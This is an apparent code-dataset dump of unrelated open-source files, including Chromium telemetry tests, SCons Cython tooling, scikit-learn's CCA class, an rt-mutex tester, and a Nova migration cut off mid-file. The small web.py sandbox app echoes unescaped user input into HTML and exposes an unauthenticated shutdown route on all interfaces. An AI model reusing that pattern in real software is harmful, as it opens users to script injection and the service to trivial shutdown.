telemetry/telemetry/internal/platform/network_controller_backend_unittest.py
|
1
|
14322
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import mock
import unittest
from telemetry.internal import forwarders
from telemetry.internal.platform import network_controller_backend
from telemetry.util import wpr_modes
DEFAULT_PORTS = forwarders.PortSet(http=1111, https=2222, dns=3333)
FORWARDER_HOST_IP = '123.321.123.321'
EXPECTED_WPR_CA_CERT_PATH = os.path.join('[tempdir]', 'testca.pem')
class FakePlatformBackend(object):
def __init__(self):
self.forwarder_factory = FakeForwarderFactory()
self.supports_test_ca = True
self.is_test_ca_installed = False
self.faulty_cert_installer = False
self.wpr_port_pairs = None
# Normally test using all default ports.
self.SetWprPortPairs(http=(0, 0), https=(0, 0), dns=(0, 0))
def SetWprPortPairs(self, http, https, dns):
self.wpr_port_pairs = forwarders.PortPairs(
forwarders.PortPair(*http),
forwarders.PortPair(*https),
forwarders.PortPair(*dns) if dns is not None else None)
def GetWprPortPairs(self, has_netsim):
del has_netsim # Unused.
return self.wpr_port_pairs
def InstallTestCa(self, ca_cert_path):
del ca_cert_path # Unused argument.
self.is_test_ca_installed = True
# Exception is raised after setting the "installed" value to confirm that
# cleanup code is being called in case of errors.
if self.faulty_cert_installer:
raise Exception('Cert install failed!')
def RemoveTestCa(self):
self.is_test_ca_installed = False
class FakeForwarderFactory(object):
def __init__(self):
self.host_ip = FORWARDER_HOST_IP
def Create(self, port_pairs):
return forwarders.Forwarder(port_pairs)
class FakeReplayServer(object):
DEFAULT_PORTS = NotImplemented # Will be assigned during test setUp.
def __init__(self, archive_path, host_ip, http_port, https_port, dns_port,
replay_args):
self.archive_path = archive_path
self.host_ip = host_ip
self.ports = forwarders.PortSet(
http_port or self.DEFAULT_PORTS.http,
https_port or self.DEFAULT_PORTS.https,
dns_port or self.DEFAULT_PORTS.dns if dns_port is not None else None)
self.replay_args = replay_args
self.is_running = False
def StartServer(self):
assert not self.is_running
self.is_running = True
return self.ports
def StopServer(self):
assert self.is_running
self.is_running = False
class TestNetworkControllerBackend(
network_controller_backend.NetworkControllerBackend):
"""Expose some private properties for testing purposes."""
@property
def wpr_ca_cert_path(self):
return self._wpr_ca_cert_path
@property
def replay_server(self):
return self._wpr_server
@property
def forwarder(self):
return self._forwarder
@property
def platform_backend(self):
return self._platform_backend
class NetworkControllerBackendTest(unittest.TestCase):
def Patch(self, *args, **kwargs):
"""Patch an object for the duration of a test, and return its mock."""
patcher = mock.patch(*args, **kwargs)
mock_object = patcher.start()
self.addCleanup(patcher.stop)
return mock_object
def PatchImportedModule(self, name):
"""Shorthand to patch a module imported by network_controller_backend."""
return self.Patch(
'telemetry.internal.platform.network_controller_backend.%s' % name)
def setUp(self):
# Always use our FakeReplayServer.
FakeReplayServer.DEFAULT_PORTS = DEFAULT_PORTS # Use global defaults.
self.Patch(
'telemetry.internal.util.webpagereplay.ReplayServer', FakeReplayServer)
# Pretend that only some predefined set of files exist.
def fake_path_exists(filename):
return filename in ['some-archive.wpr', 'another-archive.wpr']
self.Patch('os.path.exists', side_effect=fake_path_exists)
# Mock some imported modules.
mock_certutils = self.PatchImportedModule('certutils')
mock_certutils.openssl_import_error = None
mock_certutils.generate_dummy_ca_cert.return_value = ('-', '-')
mock_platformsettings = self.PatchImportedModule('platformsettings')
mock_platformsettings.HasSniSupport.return_value = True
mock_tempfile = self.PatchImportedModule('tempfile')
mock_tempfile.mkdtemp.return_value = '[tempdir]'
self.PatchImportedModule('shutil')
self.network_controller_backend = TestNetworkControllerBackend(
FakePlatformBackend())
def testOpenCloseController(self):
b = self.network_controller_backend
self.assertFalse(b.is_open)
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg']) # Also installs test CA.
self.assertTrue(b.is_open)
self.assertTrue(b.is_test_ca_installed)
self.assertTrue(b.platform_backend.is_test_ca_installed)
b.Close() # Also removes test CA.
self.assertFalse(b.is_open)
self.assertFalse(b.is_test_ca_installed)
self.assertFalse(b.platform_backend.is_test_ca_installed)
b.Close() # It's fine to close a closed controller.
self.assertFalse(b.is_open)
def testOpeningOpenControllerRaises(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
with self.assertRaises(AssertionError):
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
def testInstallTestCaFailure(self):
b = self.network_controller_backend
b.platform_backend.faulty_cert_installer = True
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg']) # Try to install test CA.
# Test CA is not installed, but the controller is otherwise open and safe
# to use.
self.assertTrue(b.is_open)
self.assertFalse(b.is_test_ca_installed)
self.assertFalse(b.platform_backend.is_test_ca_installed)
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
b.Close() # No test CA to remove.
self.assertFalse(b.is_open)
self.assertFalse(b.is_test_ca_installed)
self.assertFalse(b.platform_backend.is_test_ca_installed)
def testStartStopReplay(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
self.assertFalse(b.is_replay_active)
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertTrue(b.replay_server.is_running)
self.assertIsNotNone(b.forwarder.port_pairs)
old_replay_server = b.replay_server
old_forwarder = b.forwarder
b.StopReplay()
self.assertFalse(b.is_replay_active)
self.assertFalse(old_replay_server.is_running)
self.assertIsNone(old_forwarder.port_pairs)
self.assertTrue(b.is_open) # Controller is still open.
b.Close()
self.assertFalse(b.is_open)
def testClosingControllerAlsoStopsReplay(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertTrue(b.replay_server.is_running)
self.assertIsNotNone(b.forwarder.port_pairs)
old_replay_server = b.replay_server
old_forwarder = b.forwarder
b.Close()
self.assertFalse(b.is_replay_active)
self.assertFalse(old_replay_server.is_running)
self.assertIsNone(old_forwarder.port_pairs)
self.assertFalse(b.is_open)
def testReplayOnClosedControllerRaises(self):
b = self.network_controller_backend
self.assertFalse(b.is_open)
with self.assertRaises(AssertionError):
b.StartReplay('some-archive.wpr')
def testReplayWithSameArgsReuseServer(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertTrue(b.replay_server.is_running)
old_replay_server = b.replay_server
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertIs(b.replay_server, old_replay_server)
self.assertTrue(b.replay_server.is_running)
def testReplayWithDifferentArgsUseDifferentServer(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertTrue(b.replay_server.is_running)
old_replay_server = b.replay_server
b.StartReplay('another-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertIsNot(b.replay_server, old_replay_server)
self.assertTrue(b.replay_server.is_running)
self.assertFalse(old_replay_server.is_running)
def testReplayWithoutArchivePathDoesNotStopReplay(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertTrue(b.replay_server.is_running)
old_replay_server = b.replay_server
b.StartReplay(None)
self.assertTrue(b.is_replay_active)
self.assertIs(b.replay_server, old_replay_server)
self.assertTrue(b.replay_server.is_running)
self.assertEqual(b.replay_server.archive_path, 'some-archive.wpr')
def testModeOffDoesNotCreateReplayServer(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_OFF, '3g', ['--some-arg'])
b.StartReplay('may-or-may-not-exist.wpr')
self.assertFalse(b.is_replay_active)
self.assertIsNone(b.replay_server)
self.assertIsNone(b.forwarder)
def testBadArchivePathRaises(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
with self.assertRaises(network_controller_backend.ArchiveDoesNotExistError):
b.StartReplay('does-not-exist.wpr')
def testBadArchivePathOnRecordIsOkay(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_RECORD, '3g', ['--some-arg'])
b.StartReplay('does-not-exist-yet.wpr') # Does not raise.
self.assertTrue(b.is_replay_active)
def testReplayServerSettings(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_RECORD, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
# Externally visible properties
self.assertTrue(b.is_replay_active)
self.assertEqual(b.host_ip, FORWARDER_HOST_IP)
self.assertEqual(b.wpr_device_ports, DEFAULT_PORTS)
# Private replay server settings.
self.assertTrue(b.replay_server.is_running)
self.assertEqual(b.replay_server.archive_path, 'some-archive.wpr')
self.assertEqual(b.replay_server.host_ip, FORWARDER_HOST_IP)
self.assertEqual(b.replay_server.replay_args, [
'--some-arg', '--net=3g', '--record', '--inject_scripts=',
'--should_generate_certs',
'--https_root_ca_cert_path=%s' % EXPECTED_WPR_CA_CERT_PATH])
def testReplayServerOffSettings(self):
b = self.network_controller_backend
b.platform_backend.wpr_ca_cert_path = 'CERT_FILE'
b.Open(wpr_modes.WPR_OFF, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertFalse(b.is_replay_active)
self.assertEqual(b.host_ip, FORWARDER_HOST_IP)
self.assertEqual(b.wpr_device_ports, None)
self.assertIsNone(b.replay_server)
def testUseDefaultPorts(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertEqual(b.replay_server.ports, DEFAULT_PORTS)
self.assertEqual(b.wpr_device_ports, DEFAULT_PORTS)
# Invariant
self.assertEqual(b.forwarder.port_pairs.local_ports, b.replay_server.ports)
self.assertEqual(b.forwarder.port_pairs.remote_ports, b.wpr_device_ports)
def testUseDefaultLocalPorts(self):
b = self.network_controller_backend
b.platform_backend.SetWprPortPairs(
http=(0, 8888), https=(0, 4444), dns=(0, 2222))
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertEqual(b.replay_server.ports, DEFAULT_PORTS)
self.assertEqual(b.wpr_device_ports, forwarders.PortSet(8888, 4444, 2222))
# Invariant
self.assertEqual(b.forwarder.port_pairs.local_ports, b.replay_server.ports)
self.assertEqual(b.forwarder.port_pairs.remote_ports, b.wpr_device_ports)
def testUseSpecificPorts(self):
b = self.network_controller_backend
b.platform_backend.SetWprPortPairs(
http=(88, 8888), https=(44, 4444), dns=None)
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertEqual(b.replay_server.ports, forwarders.PortSet(88, 44, None))
self.assertEqual(b.wpr_device_ports, forwarders.PortSet(8888, 4444, None))
# Invariant
self.assertEqual(b.forwarder.port_pairs.local_ports, b.replay_server.ports)
self.assertEqual(b.forwarder.port_pairs.remote_ports, b.wpr_device_ports)
def testRestartReplayShouldReusePorts(self):
FakeReplayServer.DEFAULT_PORTS = forwarders.PortSet(123, 456, 789)
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertEqual(b.wpr_device_ports, forwarders.PortSet(123, 456, 789))
# If replay restarts, the factory may use a different set of default ports.
FakeReplayServer.DEFAULT_PORTS = forwarders.PortSet(987, 654, 321)
b.StartReplay('another-archive.wpr')
# However same ports must be used, because apps/browsers may already be
# configured to use the old set of ports.
self.assertEqual(b.wpr_device_ports, forwarders.PortSet(123, 456, 789))
def testNewControllerSessionMayUseDifferentPorts(self):
FakeReplayServer.DEFAULT_PORTS = forwarders.PortSet(123, 456, 789)
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertEqual(b.wpr_device_ports, forwarders.PortSet(123, 456, 789))
b.Close()
# If replay restarts, the factory may use a different set of default ports.
FakeReplayServer.DEFAULT_PORTS = forwarders.PortSet(987, 654, 321)
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
# This time the network controller session was closed between replays,
# so it's fine to use a different set of ports.
self.assertEqual(b.wpr_device_ports, forwarders.PortSet(987, 654, 321))
|
bsd-3-clause
|
kylepolich/sandbox
|
andrew/example.py
|
1
|
2031
|
#!/usr/bin/python
import daemon
import web
import sys
import os
port=8081
header = '<html><body><a href="/car/list">List</a> | <a href="/car/set">Set</a> | <a href="/goodbye">Terminate Server</a><br/>'
footer = '</body></html>'
class hello:
def GET(self):
return header + footer
class car_list:
def GET(self):
bdy = header + 'Cars:<br/><br/>'
if os.path.isfile(saveFile):
f = open(saveFile, 'r')
lines = f.readlines()
for line in lines:
bdy += line.replace('\n', '<br/>').replace('\t', ' = ')
else:
bdy += 'None yet'
bdy += footer
return bdy
class car_set:
def GET(self):
return header + '<form action="/car/set" method="post">Make and Model: <input name="name" /> Price: <input name="price" /><input type="submit" /></form>' + footer
def POST(self):
i = web.input()
name = i.name
price = i.price
f = open(saveFile, 'a')
f.write(name)
f.write('\t')
f.write(price)
f.write('\n')
f.close()
return header + 'Done. Do another.<br/><br/><form action="/car/set" method="post">Make and Model: <input name="name" /> Price: <input name="price" /><input type="submit" /></form>' + footer
class goodbye:
def GET(self):
app.stop()
return '<html><body>Goodbye</body></html>'
class error:
def GET(self, req):
return 'error'
def POST(self):
return 'error'
class MyApplication(web.application):
def run(self, port=port, *middleware):
func = self.wsgifunc(*middleware)
return web.httpserver.runsimple(func, ('0.0.0.0', port))
if __name__ == "__main__":
if (len(sys.argv) != 2 or sys.argv[1]==''):
print "USAGE: one parameter specifying the file where you want to store data"
raise SystemExit
global saveFile
saveFile = sys.argv.pop()
urls = (
'/', 'hello',
'/car/list', 'car_list',
'/car/set', 'car_set',
'/goodbye', 'goodbye',
'/(.*)', 'error'
)
app = MyApplication(urls, globals())
with daemon.DaemonContext():
app.run(port=port)
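# Illustrative usage note (not part of the original script):
#   python example.py cars.txt
# then browse to http://localhost:8081/ -- the server daemonizes itself and
# appends submitted cars to the given file.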
|
cc0-1.0
|
ricotabor/opendrop
|
site_scons/site_tools/cython.py
|
2
|
8689
|
import os
import re
import shlex
import subprocess
from SCons.Scanner import FindPathDirs
from SCons.Script import Action, Builder
def exists(env):
return env.Detect('cython')
def generate(env):
env.Tool('python')
env.SetDefault(CYTHONPATH=[])
env['BUILDERS']['Cython'] = Builder(
action=Action(
cython_build_action,
strfunction=cython_build_strfunction,
),
suffix='.cpp',
src_suffix='.pyx',
)
scanner = env.Scanner(
function=cython_scan,
skeys=['.pyx', '.pyd', '.pyi'],
path_function=lambda *args: (
FindPathDirs('PYTHONPATH')(*args)
+ FindPathDirs('CYTHONPATH')(*args)
),
recursive=True,
)
env.Append(SCANNERS=scanner)
def cython_build_action(target, source, env):
try:
subprocess.check_call(cython_build_command(target, source, env))
except subprocess.CalledProcessError:
if os.path.isfile(target[0].abspath):
os.remove(target[0].abspath)
return 1
def cython_build_strfunction(target, source, env):
if getattr(shlex, 'join', None):
return shlex.join(cython_build_command(target, source, env))
else:
# XXX: For Python 3.6 compatibility.
return ' '.join(shlex.quote(s) for s in cython_build_command(target, source, env))
def cython_build_command(target, source, env):
flags = ['-3']
flags += ['-I' + str(p) for p in env['CYTHONPATH']]
if target[0].get_suffix() == '.cpp':
flags.append('--cplus')
return [
env.subst('$PYTHON'),
'-m',
'cython',
*flags,
'-o',
*env.subst(['$TARGET', '$SOURCE'], target=target, source=source),
]
def cython_scan(node, env, path):
deps = []
contents = node.get_text_contents()
cimports, includes, externs = extract_dependencies(contents)
for cimport in cimports:
dep = find_pdx(cimport, node, env, path)
if dep is not None:
deps += dep
for include in includes:
dep = env.FindFile(include, path)
if dep is not None:
deps.append(dep)
return deps
def find_pdx(modulename, imported_from, env, search_dirs):
*parents, base = modulename.split('.')
if parents and parents[0] == '':
path = imported_from
i = 0
for i, package in enumerate(parents):
if package != '': break
path = path.Dir('..')
return find_pdx_in_dir('.'.join([*parents[i:], base]), env, path)
for path in search_dirs:
deps = find_pdx_in_dir(modulename, env, path)
if deps:
break
else:
return []
return deps
def find_pdx_in_dir(modulename, env, directory):
deps = []
*parents, base = modulename.split('.')
if base == '':
return None
path = directory
if len(parents) > 1:
for p in parents[:-1]:
next_path = path.Dir(p)
if next_path.exists():
path = next_path
package = env.FindFile('__init__.pxd', path)
if package is not None:
deps.append(package)
else:
return []
if len(parents) > 0:
next_path = path.Dir(parents[-1])
if next_path.exists():
package = env.FindFile('__init__.pxd', next_path)
if package is not None:
deps.append(package)
path = next_path
else:
module = env.FindFile(parents[-1] + '.pxd', next_path)
if module is not None:
deps.append(module)
return deps
module = env.FindFile(base + '.pxd', path)
if module is not None:
deps.append(module)
return deps
# Taken from Cython codebase.
dependency_regex = re.compile(
r"(?:^\s*from +([0-9a-zA-Z_.]+) +cimport)|"
r"(?:^\s*cimport +([0-9a-zA-Z_.]+(?: *, *[0-9a-zA-Z_.]+)*))|"
r"(?:^\s*cdef +extern +from +['\"]([^'\"]+)['\"])|"
r"(?:^\s*include +['\"]([^'\"]+)['\"])",
re.M
)
dependency_after_from_regex = re.compile(
r"^"
r"(?:\\\n|[^S\n]*)*"
r"\((\s*"
r"(?:"
+ r"[^()\\\n]*"
+ r"\s*(?:\s*#.*|\s*\\\n)*\s*" # Line continuation or comment.
+ r","
+ r"\s*(?:\s*#.*|\s*\\\n)*\s*"
r")*"
r"(?:"
+ r"[^()\\\n]*"
+ r"\s*(?:\s*#.*|\s*\\\n)*"
r")?"
r"\s*)\)"
r"|"
r"^((?:[^()\\\n]*(?:\\\n))*(?:[^()\\\n]*(?:\n|$)))"
)
# Taken from Cython codebase.
def extract_dependencies(code):
source, literals = escape_string_literals(code)
source = source.replace('\\\n', ' ').replace('\t', ' ')
cimports = []
includes = []
externs = []
for m in dependency_regex.finditer(source):
cimport_from, cimport_list, extern, include = m.groups()
if cimport_from:
cimports.append(cimport_from)
m_after_from = dependency_after_from_regex.search(source[m.end():])
if m_after_from:
multi_line, one_line = m_after_from.groups()
subimports = multi_line or one_line
# Remove line continuations.
subimports = subimports.replace('\\', '')
# Remove comments.
subimports = re.sub(r"#.*", '', subimports)
# Remove aliases and split to list.
subimports = [re.sub("as .*", '', s, flags=re.DOTALL).strip() for s in subimports.split(',')]
cimports.extend(
"{0}.{1}".format(
re.sub(r"\.$", '', cimport_from),
subimport
)
for subimport in subimports
)
elif cimport_list:
cimports.extend(x.strip() for x in cimport_list.split(","))
elif extern:
externs.append(literals[extern])
else:
includes.append(literals[include])
return cimports, includes, externs
# Taken from Cython codebase.
def escape_string_literals(code, prefix='__Pyx_L'):
"""
Normalizes every string literal to be of the form '__Pyx_Lxxx_',
returning the normalized code and a mapping of labels to
string literals.
"""
new_code = []
literals = {}
counter = 0
start = q = 0
in_quote = False
hash_mark = single_q = double_q = -1
code_len = len(code)
quote_type = None
quote_len = -1
while True:
if hash_mark < q:
hash_mark = code.find('#', q)
if single_q < q:
single_q = code.find("'", q)
if double_q < q:
double_q = code.find('"', q)
q = min(single_q, double_q)
if q == -1:
q = max(single_q, double_q)
# We're done.
if q == -1 and hash_mark == -1:
new_code.append(code[start:])
break
# Try to close the quote.
elif in_quote:
if code[q-1] == u'\\':
k = 2
while q >= k and code[q-k] == u'\\':
k += 1
if k % 2 == 0:
q += 1
continue
if code[q] == quote_type and (
quote_len == 1 or (code_len > q + 2 and quote_type == code[q+1] == code[q+2])):
counter += 1
label = "%s%s_" % (prefix, counter)
literals[label] = code[start+quote_len:q]
full_quote = code[q:q+quote_len]
new_code.append(full_quote)
new_code.append(label)
new_code.append(full_quote)
q += quote_len
in_quote = False
start = q
else:
q += 1
# Process comment.
elif -1 != hash_mark and (hash_mark < q or q == -1):
new_code.append(code[start:hash_mark+1])
end = code.find('\n', hash_mark)
counter += 1
label = "%s%s_" % (prefix, counter)
if end == -1:
end_or_none = None
else:
end_or_none = end
literals[label] = code[hash_mark+1:end_or_none]
new_code.append(label)
if end == -1:
break
start = q = end
# Open the quote.
else:
if code_len >= q+3 and (code[q] == code[q+1] == code[q+2]):
quote_len = 3
else:
quote_len = 1
in_quote = True
quote_type = code[q]
new_code.append(code[start:q])
start = q
q += quote_len
return "".join(new_code), literals
|
gpl-2.0
|
iDTLabssl/kitsune
|
kitsune/settings_test.py
|
16
|
1298
|
# The test system uses this to override settings in settings.py and
# settings_local.py with settings appropriate for testing.
import os
ES_LIVE_INDEXING = False
ES_INDEX_PREFIX = 'sumotest'
ES_INDEXES = {
'default': 'test-default',
'non-critical': 'test-non-critical',
'metrics': 'test-metrics',
}
ES_WRITE_INDEXES = ES_INDEXES
# Make sure Celery is EAGER.
CELERY_ALWAYS_EAGER = True
# Make sure we use port 6383 db 2 redis for tests. That's db 2 of the
# redis test config. That shouldn't collide with anything else.
REDIS_BACKENDS = {
'default': 'redis://localhost:6383?socket_timeout=0.5&db=2',
'karma': 'redis://localhost:6383?socket_timeout=0.5&db=2',
'helpfulvotes': 'redis://localhost:6383?socket_timeout=0.5&db=2',
}
# Some cron jobs are skipped on stage.
STAGE = False
SESSION_COOKIE_SECURE = False
# The way we do live server test cases is greedy with ports. This gives
# it more ports, but won't clobber settings from the environment.
if 'DJANGO_LIVE_TEST_SERVER_ADDRESS' not in os.environ:
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = 'localhost:8081-8090'
# Tells django-axes we aren't behind a reverse proxy.
AXES_BEHIND_REVERSE_PROXY = False
# Make sure pipeline is enabled so it does not run collectstatic on every test
PIPELINE_ENABLED = True
|
bsd-3-clause
|
xubenben/scikit-learn
|
sklearn/cross_decomposition/cca_.py
|
209
|
3150
|
from .pls_ import _PLS
__all__ = ['CCA']
class CCA(_PLS):
"""CCA Canonical Correlation Analysis.
CCA inherits from PLS with mode="B" and deflation_mode="canonical".
Read more in the :ref:`User Guide <cross_decomposition>`.
Parameters
----------
n_components : int, (default 2)
Number of components to keep.
scale : boolean, (default True)
Whether to scale the data.
max_iter : int, (default 500)
The maximum number of iterations of the NIPALS inner loop.
tol : non-negative real, (default 1e-06)
The tolerance used in the iterative algorithm.
copy : boolean
Whether the deflation should be done on a copy. Leave the default
value of True unless you don't care about side effects.
Attributes
----------
x_weights_ : array, [p, n_components]
X block weights vectors.
y_weights_ : array, [q, n_components]
Y block weights vectors.
x_loadings_ : array, [p, n_components]
X block loadings vectors.
y_loadings_ : array, [q, n_components]
Y block loadings vectors.
x_scores_ : array, [n_samples, n_components]
X scores.
y_scores_ : array, [n_samples, n_components]
Y scores.
x_rotations_ : array, [p, n_components]
X block to latents rotations.
y_rotations_ : array, [q, n_components]
Y block to latents rotations.
n_iter_ : array-like
Number of iterations of the NIPALS inner loop for each
component.
Notes
-----
For each component k, find the weights u, v that maximize
max corr(Xk u, Yk v), such that ``|u| = |v| = 1``
Note that it maximizes only the correlations between the scores.
The residual matrix of X (Xk+1) block is obtained by the deflation on the
current X score: x_score.
The residual matrix of Y (Yk+1) block is obtained by deflation on the
current Y score.
Examples
--------
>>> from sklearn.cross_decomposition import CCA
>>> X = [[0., 0., 1.], [1.,0.,0.], [2.,2.,2.], [3.,5.,4.]]
>>> Y = [[0.1, -0.2], [0.9, 1.1], [6.2, 5.9], [11.9, 12.3]]
>>> cca = CCA(n_components=1)
>>> cca.fit(X, Y)
... # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
CCA(copy=True, max_iter=500, n_components=1, scale=True, tol=1e-06)
>>> X_c, Y_c = cca.transform(X, Y)
References
----------
Jacob A. Wegelin. A survey of Partial Least Squares (PLS) methods, with
emphasis on the two-block case. Technical Report 371, Department of
Statistics, University of Washington, Seattle, 2000.
In French but still a reference:
Tenenhaus, M. (1998). La regression PLS: theorie et pratique. Paris:
Editions Technip.
See also
--------
PLSCanonical
PLSSVD
"""
def __init__(self, n_components=2, scale=True,
max_iter=500, tol=1e-06, copy=True):
_PLS.__init__(self, n_components=n_components, scale=scale,
deflation_mode="canonical", mode="B",
norm_y_weights=True, algorithm="nipals",
max_iter=max_iter, tol=tol, copy=copy)
|
bsd-3-clause
|
Buckmarble/Elite_Lunar_kernel
|
scripts/rt-tester/rt-tester.py
|
11005
|
5307
|
#!/usr/bin/python
#
# rt-mutex tester
#
# (C) 2006 Thomas Gleixner <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
import os
import sys
import getopt
import shutil
import string
# Globals
quiet = 0
test = 0
comments = 0
sysfsprefix = "/sys/devices/system/rttest/rttest"
statusfile = "/status"
commandfile = "/command"
# Command opcodes
cmd_opcodes = {
"schedother" : "1",
"schedfifo" : "2",
"lock" : "3",
"locknowait" : "4",
"lockint" : "5",
"lockintnowait" : "6",
"lockcont" : "7",
"unlock" : "8",
"signal" : "11",
"resetevent" : "98",
"reset" : "99",
}
test_opcodes = {
"prioeq" : ["P" , "eq" , None],
"priolt" : ["P" , "lt" , None],
"priogt" : ["P" , "gt" , None],
"nprioeq" : ["N" , "eq" , None],
"npriolt" : ["N" , "lt" , None],
"npriogt" : ["N" , "gt" , None],
"unlocked" : ["M" , "eq" , 0],
"trylock" : ["M" , "eq" , 1],
"blocked" : ["M" , "eq" , 2],
"blockedwake" : ["M" , "eq" , 3],
"locked" : ["M" , "eq" , 4],
"opcodeeq" : ["O" , "eq" , None],
"opcodelt" : ["O" , "lt" , None],
"opcodegt" : ["O" , "gt" , None],
"eventeq" : ["E" , "eq" , None],
"eventlt" : ["E" , "lt" , None],
"eventgt" : ["E" , "gt" , None],
}
# Print usage information
def usage():
print "rt-tester.py <-c -h -q -t> <testfile>"
print " -c display comments after first command"
print " -h help"
print " -q quiet mode"
print " -t test mode (syntax check)"
print " testfile: read test specification from testfile"
print " otherwise from stdin"
return
# Print progress when not in quiet mode
def progress(str):
if not quiet:
print str
# Analyse a status value
def analyse(val, top, arg):
intval = int(val)
if top[0] == "M":
intval = intval / (10 ** int(arg))
intval = intval % 10
argval = top[2]
elif top[0] == "O":
argval = int(cmd_opcodes.get(arg, arg))
else:
argval = int(arg)
# progress("%d %s %d" %(intval, top[1], argval))
if top[1] == "eq" and intval == argval:
return 1
if top[1] == "lt" and intval < argval:
return 1
if top[1] == "gt" and intval > argval:
return 1
return 0
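# Illustrative test lines (hypothetical, following the cmd:opcode:threadid:data
# format parsed below):
#
#   C: lock: 0: 0      issue the "lock" command (opcode 3) to thread 0
#   W: locked: 0: 0    wait until digit 0 of the "M" status value equals 4
#
# For "M" opcodes, analyse() extracts decimal digit number <data> of the
# status value and compares it against the expected value in test_opcodes.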
# Parse the commandline
try:
(options, arguments) = getopt.getopt(sys.argv[1:],'chqt')
except getopt.GetoptError, ex:
usage()
sys.exit(1)
# Parse commandline options
for option, value in options:
if option == "-c":
comments = 1
elif option == "-q":
quiet = 1
elif option == "-t":
test = 1
elif option == '-h':
usage()
sys.exit(0)
# Select the input source
if arguments:
try:
fd = open(arguments[0])
except Exception,ex:
sys.stderr.write("File not found %s\n" %(arguments[0]))
sys.exit(1)
else:
fd = sys.stdin
linenr = 0
# Read the test patterns
while 1:
linenr = linenr + 1
line = fd.readline()
if not len(line):
break
line = line.strip()
parts = line.split(":")
if not parts or len(parts) < 1:
continue
if len(parts[0]) == 0:
continue
if parts[0].startswith("#"):
if comments > 1:
progress(line)
continue
if comments == 1:
comments = 2
progress(line)
cmd = parts[0].strip().lower()
opc = parts[1].strip().lower()
tid = parts[2].strip()
dat = parts[3].strip()
try:
# Test or wait for a status value
if cmd == "t" or cmd == "w":
testop = test_opcodes[opc]
fname = "%s%s%s" %(sysfsprefix, tid, statusfile)
if test:
print fname
continue
while 1:
query = 1
fsta = open(fname, 'r')
status = fsta.readline().strip()
fsta.close()
stat = status.split(",")
for s in stat:
s = s.strip()
if s.startswith(testop[0]):
# Separate status value
val = s[2:].strip()
query = analyse(val, testop, dat)
break
if query or cmd == "t":
break
progress(" " + status)
if not query:
sys.stderr.write("Test failed in line %d\n" %(linenr))
sys.exit(1)
# Issue a command to the tester
elif cmd == "c":
cmdnr = cmd_opcodes[opc]
# Build command string and sys filename
cmdstr = "%s:%s" %(cmdnr, dat)
fname = "%s%s%s" %(sysfsprefix, tid, commandfile)
if test:
print fname
continue
fcmd = open(fname, 'w')
fcmd.write(cmdstr)
fcmd.close()
except Exception,ex:
sys.stderr.write(str(ex))
sys.stderr.write("\nSyntax error in line %d\n" %(linenr))
if not test:
fd.close()
sys.exit(1)
# Normal exit pass
print "Pass"
sys.exit(0)
|
gpl-2.0
|
vladikr/nova_drafts
|
nova/db/sqlalchemy/migrate_repo/versions/252_add_instance_extra_table.py
|
29
|
2574
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from migrate import ForeignKeyConstraint
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import Index
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import Text
def upgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
columns = [
(('created_at', DateTime), {}),
(('updated_at', DateTime), {}),
(('deleted_at', DateTime), {}),
(('deleted', Integer), {}),
